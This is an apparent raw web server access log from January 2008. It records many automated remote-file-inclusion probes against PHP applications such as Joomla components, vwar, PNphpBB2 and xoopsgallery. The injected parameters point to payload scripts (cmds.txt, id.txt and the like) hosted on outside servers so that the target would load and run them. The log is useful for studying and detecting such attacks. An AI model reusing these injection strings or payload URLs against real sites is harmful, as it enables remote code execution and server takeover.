64.38.50.26 - - [26/Jan/2008:09:13:10 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [26/Jan/2008:09:13:10 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [26/Jan/2008:09:14:05 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.74.21 - - [26/Jan/2008:09:15:53 -0800] "GET /logs/access_080106.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.216.249.194 - - [26/Jan/2008:09:16:12 -0800] "GET /logs/access_080106.log//index.php?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.249.194 - - [26/Jan/2008:09:16:12 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.249.194 - - [26/Jan/2008:09:16:12 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.111.44.140 - - [26/Jan/2008:09:16:53 -0800] "GET /logs/access_080106.log//index.php?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.111.44.140 - - [26/Jan/2008:09:16:54 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.111.44.140 - - [26/Jan/2008:09:16:54 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.185.237.20 - - [26/Jan/2008:09:19:21 -0800] "GET //intern/clan/member_add.php?rootdir=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.185.237.20 - - [26/Jan/2008:09:19:21 -0800] "GET /logs//intern/clan/member_add.php?rootdir=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
194.30.169.80 - - [26/Jan/2008:09:22:01 -0800] "GET /logs/access_071225.log/index.php?lolhttp://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [26/Jan/2008:09:22:02 -0800] "GET /index.php?lolhttp://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [26/Jan/2008:09:22:02 -0800] "GET /logs/index.php?lolhttp://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.44.94 - - [26/Jan/2008:09:22:12 -0800] "GET /logs/access_071228.log HTTP/1.0" 200 398582 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:09:22:26 -0800] "GET /logs/access_071219.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:09:22:26 -0800] "GET /logs/access_071219.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:09:22:26 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:09:22:26 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:09:22:26 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:09:22:26 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:09:22:30 -0800] "GET /logs/access_071220.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:09:22:30 -0800] "GET /logs/access_071220.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:09:23:14 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.228.74 - - [26/Jan/2008:09:23:24 -0800] "GET /logs/access_071225.log/index.php?body=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.228.74 - - [26/Jan/2008:09:23:24 -0800] "GET /index.php?body=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.228.74 - - [26/Jan/2008:09:23:24 -0800] "GET /logs/index.php?body=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:09:23:25 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:09:23:32 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.55.165.116 - - [26/Jan/2008:09:23:50 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [26/Jan/2008:09:23:50 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [26/Jan/2008:09:23:50 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:09:24:10 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.216.11 - - [26/Jan/2008:09:24:29 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.38.50.26 - - [26/Jan/2008:09:25:44 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://dark4.hostinggratisargentina.com/safe.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.216.11 - - [26/Jan/2008:09:26:01 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:09:26:11 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:09:26:37 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:09:26:37 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:09:26:38 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.94.1.95 - - [26/Jan/2008:09:27:42 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.216.11 - - [26/Jan/2008:09:28:05 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.193.216.11 - - [26/Jan/2008:09:28:06 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.193.216.11 - - [26/Jan/2008:09:28:06 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.193.216.11 - - [26/Jan/2008:09:28:33 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.193.216.11 - - [26/Jan/2008:09:28:33 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.193.216.11 - - [26/Jan/2008:09:28:33 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:09:29:18 -0800] "GET /logs/access_071219.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:09:29:18 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:09:29:18 -0800] "GET /logs/access_071219.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:09:29:18 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:09:29:18 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:09:29:19 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:09:30:22 -0800] "GET /logs/access_071212.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:09:30:23 -0800] "GET /logs/access_071212.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.38.50.26 - - [26/Jan/2008:09:31:05 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.88.212.212 - - [26/Jan/2008:09:31:39 -0800] "GET //?mosConfig_absolute_path=http://190.8.128.58/.../test.txt?? HTTP/1.1" 200 2962 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
194.88.212.212 - - [26/Jan/2008:09:31:39 -0800] "GET /logs//?mosConfig_absolute_path=http://190.8.128.58/.../test.txt?? HTTP/1.1" 200 31831 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:09:31:40 -0800] "GET /logs//?mosConfig_absolute_path=http://190.8.128.58/.../test.txt?? HTTP/1.1" 200 31831 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:09:31:40 -0800] "GET //?mosConfig_absolute_path=http://190.8.128.58/.../test.txt?? HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:09:31:49 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:09:31:50 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:09:31:50 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.20 - - [26/Jan/2008:09:33:55 -0800] "GET //modules/xfsection/modify.php?dir_module=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.185.237.20 - - [26/Jan/2008:09:33:55 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
193.111.201.160 - - [26/Jan/2008:09:34:07 -0800] "GET /logs/access_080106.log//index.php?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.111.201.160 - - [26/Jan/2008:09:34:08 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.111.201.160 - - [26/Jan/2008:09:34:08 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.172.129.117 - - [26/Jan/2008:09:34:20 -0800] "GET /logs/access_071230.log/vwar/convert/mvcw.php?step=1&vwar_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.172.129.117 - - [26/Jan/2008:09:34:21 -0800] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.172.129.117 - - [26/Jan/2008:09:34:21 -0800] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.91.66.79 - - [26/Jan/2008:09:34:26 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.18.66 - - [26/Jan/2008:09:35:29 -0800] "GET /logs/access_080106.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:09:36:07 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:09:36:07 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:09:36:07 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.94.230.194 - - [26/Jan/2008:09:36:30 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.92.23.94 - - [26/Jan/2008:09:36:35 -0800] "GET /logs/access_080106.log//?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.92.23.94 - - [26/Jan/2008:09:36:36 -0800] "GET //?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
212.92.23.94 - - [26/Jan/2008:09:36:36 -0800] "GET /logs//?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 200 32488 "-" "libwww-perl/5.803" "www.dmulk.com"
213.176.161.204 - - [26/Jan/2008:09:36:52 -0800] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://puerco.altervista.org/new/bx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.176.161.204 - - [26/Jan/2008:09:36:53 -0800] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
213.176.161.204 - - [26/Jan/2008:09:36:58 -0800] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://puerco.altervista.org/new/bx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.176.161.204 - - [26/Jan/2008:09:36:58 -0800] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:09:38:42 -0800] "GET /index.php?body=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.74.44 - - [26/Jan/2008:09:39:36 -0800] "GET /index.php?option=com_forum&task=doc_view&gid=&mosConfig_absolute_path=http://83.19.144.26/cmd.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
67.15.74.44 - - [26/Jan/2008:09:39:36 -0800] "GET /logs/index.php?option=com_forum&task=doc_view&gid=&mosConfig_absolute_path=http://83.19.144.26/cmd.do?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
62.193.216.11 - - [26/Jan/2008:09:42:38 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.6.23.75 - - [26/Jan/2008:09:42:43 -0800] "GET /logs/access_071227.log HTTP/1.0" 200 452672 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.185.237.20 - - [26/Jan/2008:09:43:53 -0800] "GET //modules/xfsection/modify.php?dir_module=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.185.237.20 - - [26/Jan/2008:09:43:53 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.232.118.239 - - [26/Jan/2008:09:44:39 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:09:45:27 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:09:45:27 -0800] "GET /logs/access_080106.log//tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:09:45:28 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:09:45:28 -0800] "GET /logs/access_080101.log/index.php?redir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:09:45:28 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:09:45:28 -0800] "GET /index.php?redir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:09:45:28 -0800] "GET /logs/index.php?redir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.94.1.95 - - [26/Jan/2008:09:45:41 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.94.1.95 - - [26/Jan/2008:09:45:41 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:09:47:01 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.172.129.117 - - [26/Jan/2008:09:48:07 -0800] "GET /logs/access_071229.log/vwar/convert/mvcw.php?step=1&vwar_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:09:48:23 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:09:49:35 -0800] "GET /logs/access_071224.log/index.php?redir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
